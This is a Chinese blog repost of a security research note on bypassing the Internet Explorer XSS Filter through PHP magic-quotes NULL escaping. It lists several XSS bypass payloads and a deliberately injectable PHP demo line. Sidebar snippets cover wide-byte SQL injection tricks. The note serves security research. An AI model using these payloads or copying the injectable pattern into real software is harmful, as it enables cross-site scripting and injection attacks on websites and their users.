php绕过魔术引号,PHP魔术引号导致IE XSS Filter bypass

最新推荐文章于 2022-01-26 00:02:28 发布
最新推荐文章于 2022-01-26 00:02:28 发布
阅读量241 收藏
点赞数
文章标签: php绕过魔术引号

PHP魔术引号导致IE XSS Filter bypass

作者/xxx

首发/Insight-labs.org

在一些web容器中会对一些特殊字符做转换处理,这中间ie xss filter开发人员任何地方对它的了解有疏忽,都很可能导致bypass.

在php中,如果开启了”魔术引号”特性(magic_quotes_gpc = On),则‘ (single-quote), “ (double quote), \ (backslash) 和 NULL 字符将都会被反斜杠转义(%00 =>\0).

通过一些测试,我发现ie xss filter对NULL字符的转义处理并不感冒,意思是它并不了解这种转换过程.

1. xss.php demo source code:

var x="<?php echo $_GET['z']?>"

2. HTML bypass case:

%00%00v%00%00

tips:

1. 绕过字符必须出现在拦截规则中,例如拦截

3. Javascript bypass case:

“;alert(1)//

%c0″;alert(%00)//

%c0″;//(%0dalert(1)//

%c0″;//(%0dalert(1)//

%c0″;//(%00%0dalert(1)//

%c0″//(%000000%0dalert(1)//

tips:

1. 需要通过多字节问题吃掉一个\.

2. //(%000000%0d是用于绕过函数调用的拦截规则.

如果你有更多的想法或者小技巧,欢迎与我联系交流@xxx

瑾公
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
宽字节注入——魔术引号绕过
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-06 2700
宽字节注入 原理:由于魔术引号函数的存在magic_quotes_gpc(开关),会自动在’ “ \等前面加上一个\导致sql语句闭合不了,这时候我们就需要输入一些字符,让数据库实现误判,让转义字符\和我们输入的语句组成一个新的汉字来闭合语句。 靶场地址 第一题: 首先先在url栏输入’ and 1=2 %23 发现页面并没有变化,可能存在魔术引号,于是我在’前面添加一个%df重新输入代码 %df...
php 过滤魔术引号,php怎么关闭魔术引号
weixin_39991148的博客
04-02 130
关闭方法:在php.ini中将magic_quotes_gpc、magic_quotes_runtime、magic_quotes_sybase选项设为Off;或者在“.htaccess”中关闭magic_quotes_gpc指令。本教程操作环境:windows7系统、PHP7.1版,DELL G3电脑php关闭魔术引号的方法:1、在服务器端关闭魔术引号下面是一个通过 php.ini 文件把这些选...
MySQL魔术引号绕过
qq_39654116的博客
01-05 1468
目录绕过魔术引号简介绕过 绕过魔术引号 简介 现在的WEB程序基本都有对SQL注入的全局过滤,运维人员配置PHP环境是一般会开启魔术引号GPC,即magic_quotes_gpc=On的情况下,如果输入的数据有单引号(’)、双引号(”)、反斜线(\)与 NUL(NULL 字符)等字符都会被加上反斜线进行转义处理。不过GPC在PHP5.4版本后就取消了,所以现在一般都用addslashes()函数来代替GPC进行过滤处理。目前用PHP开发的应用一般是MVC的框架模式进行开发,对GET、POST和COOKIE等
php绕过魔术引号,php魔术引号安全问题实例分析
weixin_32163411的博客
03-20 491
php通过提取魔术引号产生的“”字符会带来一定的安全问题。例如,以下代码中:代码示例:// foo.php?xigr='ryatfunction daddslashes($string, $force = 0) {!defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());if...
php 过滤魔术引号,php魔术引号
weixin_42119281的博客
04-02 176
什么是魔术引号?当sql句中含有单引号,双引号,反斜杠和NUL时,这时候如果不对这些符号进行转义,写入数据库时就会出错,而魔术引号magic_quotes_gpc()就是对这些符号进行转义以便能把数据正确写入数据库。get_magic_quotes_gpc()获取当前magic_quotes_gpc配置选项设置,如果magic_quotes_gpc处于on,则返回1,magic_quotes_gp...
过狗菜刀原理以及绕过魔术引号的配置
dfdhxb995397的博客
08-22 340
本文作者:i春秋签约作家——凉风 首先感谢@我是salf给我的灵感 我之前发了一个帖子:过了D盾扫描的一句话木马。 里面分析了一句话木马的原理,以及过狗、D盾的木马的编写。 传送门: https://bbs.ichunqiu.com/thread-25644-1-1.html tips:下文需要知道一句话木马的原理,可看上面说的帖子 tips...
char函数绕过魔术引号注入
aiquan9342的博客
02-08 378
我目前学习到的绕过魔术引号的几种方法(如果知道还有别的请万望告之): 1.倘若服务端是GBK可以尝试宽字节注入 2.使用char函数绕过魔术引号进行注入 3.同char函数类似的函数,例如bin(转换为2进制),或者oct(转换为8进制) 本篇就是介绍char函数来进行绕过魔术引号来注入。 以下CODE是一个源码案例: <?php $link = mysq...
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
php 防止单引号,双引号在接受页面转义
12-18
您可能感兴趣的文章:简单概括PHP的字符串中单引号与双引号的区别PHP中单引号与双引号的区别分析PHP引号与双引号的区别php 输出双引号"与单引号”的方法PHP的单引号和双引号 字符串效率浅谈PHP中单引号和双引号...
php处理xss攻击过滤.rar
01-18
在Web开发中,PHP是一种广泛使用的服务器端脚本语言,特别是在构建动态网站时。然而,随着互联网技术的发展,安全问题也日...开发者可以通过学习和使用这个助手类,提升其项目的安全性,避免因XSS漏洞导致的潜在风险。
第十二节 利用IE特性绕过XSS过滤-01
09-15
XSS 攻击和 IE 特性绕过 XSS 过滤 XSS(Cross-Site Scripting),即跨站脚本攻击,是一种常见的 Web 应用安全漏洞。攻击者可以通过在目标网站中Inject恶意脚本,劫持用户会话,盗取敏感信息,甚至控制用户的浏览器...
PHP如何防止XSS攻击与XSS攻击原理的讲解
01-02
XSS又称CSS,全称Cross SiteScript(跨站脚本攻击), XSS攻击类似于SQL注入攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入...
php魔术引号总结
molaifeng的专栏
01-28 3966
在一个项目中,魔术引号若是打开的话,所有的反斜线(\)、单引号(')、双引号(")、NULL 字符都会被自动加上一个反斜线进行转义,这和 addslashes() 作用完全相同。 这里主要讲四个与之相关的函数:set_magic_quotes_runtime、magic_quotes_gpc、addslashes、stripslashes。         set_magic_quote
php 绕过引号,PHP字符编码绕过漏洞总结
weixin_39588679的博客
03-10 454
CODE:SETCHARACTERSET‘GBK’例:mysql_query(“SETCHARACTERSET‘gbk'”,$c);问题是方法二在改变字符集时mysql_real_escape_string() 并不知道而使用默认字符集处理从而造成和addslashes() 一样的漏洞$c=mysql_connect(“localhost”,“user”,“pass”);mysql_...
魔术引号与递归转义
一个优秀的程序员的逻辑运算能力是长期以来所形成的~是经历过大量编码的洗礼,是一个程序员是否优秀的标准
12-17 334
$arr = array(1,2,3,4); // 用foreach来处理$arr foreach($arr as $k=>$v) {     $arr[$k] = 2 * $v; } print_r($arr); */ // 回到$_POST上来,要循环对POST做转义 $_POST = array('age'=>28,'name'=>'abc"'); foreach($_
87.网络安全渗透测试—[常规漏洞挖掘与利用篇3]—[xss测试-10种绕过技巧]
qwsn
01-26 4854
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss测试-10种绕过技巧 1、大小写绕过:`script标签一次匹配` 2、复写绕过(属性多余):`script大小写标签一次匹配` 3、转换标签绕过:`sciprt标签禁用` 4、转换方法绕过:alert方法禁用 5、手工闭合绕过:`既定的script标签` 6、手工闭合+单引号绕过:既定的scirpt标签+htmllentities默认参数 7、dom输出+hash属性+substring方法-弹窗: 8、ph
魔术引号、addslashes和mysql_real_escape_string的防御以及绕过
weixin_33972649的博客
06-02 365
0x00:php内置过滤函数php有内置的函数用来防御***,简单的介绍几个函数。魔术引号当打开时,所有的 '(单引号),"(双引号),\(反斜线)和 NULL 字符都会被自动加上一个反斜线进行转义。这和 addslashes() 作用完全相同。一共有三个魔术引号指令:magic_quotes_gpc 影响到 HTTP 请求数据(GET,POST 和 COOKIE)。不能在运...
mysql 绕过addslashes_魔术引号、addslashes和mysql_real_escape_string的防御以及绕过
weixin_39598501的博客
01-19 1095
0x00:php内置过滤函数php有内置的函数用来防御***,简单的介绍几个函数。魔术引号当打开时,所有的 '(单引号),"(双引号),\(反斜线)和 NULL 字符都会被自动加上一个反斜线进行转义。这和 addslashes() 作用完全相同。一共有三个魔术引号指令:magic_quotes_gpc 影响到 HTTP 请求数据(GET,POST 和 COOKIE)。不能在运行时改变。在 PHP ...
2014-2023年的绿色债券数据.txt
最新发布
07-06
因文件较多,数据存放网盘,txt文件内包含下载链接及提取码,永久有效。失效会第一时间进行补充。样例数据及详细介绍参见文章:https://blog.csdn.net/samLi0620/article/details/140227523
xssPHP_SELF绕过
03-29
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者在受害者的网页上执行恶意脚本。而PHP_SELF是PHP中的一个超全局变量,它包含了当前脚本的文件路径和文件名。 在使用PHP_SELF时,如果没有进行适当的过滤和验证,攻击者可以通过构造恶意的输入来绕过安全措施,从而进行XSS攻击。一种常见的绕过方式是通过在URL中注入恶意的脚本代码。 为了防止XSS攻击,我们应该对用户输入进行严格的过滤和验证,并使用适当的编码方式来输出数据。在处理用户输入时,可以使用函数如htmlspecialchars()来转义特殊字符,或者使用过滤器函数如filter_input()来过滤输入数据。 另外,还可以采取以下措施来增强安全性: 1. 使用CSP(内容安全策略)来限制页面中可以加载的资源。 2. 设置HTTP头中的X-XSS-Protection选项来启用浏览器内置的XSS过滤器。 3. 使用安全的编码方式,如将用户输入作为属性值时使用引号包裹。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值